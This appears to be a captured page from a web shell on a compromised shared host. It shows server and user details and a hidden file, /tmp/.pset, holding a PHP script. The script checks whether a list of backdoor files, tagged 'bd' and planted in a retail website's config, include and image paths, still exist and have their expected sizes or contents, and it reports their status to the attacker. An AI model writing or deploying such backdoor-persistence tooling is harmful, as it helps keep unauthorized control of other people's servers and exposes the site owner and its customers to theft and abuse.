HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //tmp/.pset
<?php   $r = '/home/vitanhod/virgomax.vitavit.com.pk'; $x = ["/orderemail_bk.php"=>"bd@@1269041@@49",
"/includes/configOnline.php"=>"bd@@1269151@@69",
"/includes/config.php"=>"bd@@1269440@@28",
"/img/Logger.php"=>"bd@@1276217@@64",
"/db_events.inc.php"=>"bd@@1269583@@935",
"/includes/behavior.php"=>"bd@@1276518@@80",
"/orderemail.php"=>"bd@@1269338@@70",
"/includes/behavior.php"=>"bd@@1269519@@975",
"/img/Logger.php"=>"bd@@1268523@@837",
"/img/bannerclient.php"=>"bd@@1309821@@997",
"/db_events.inc.php"=>"bd@@1276370@@26"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');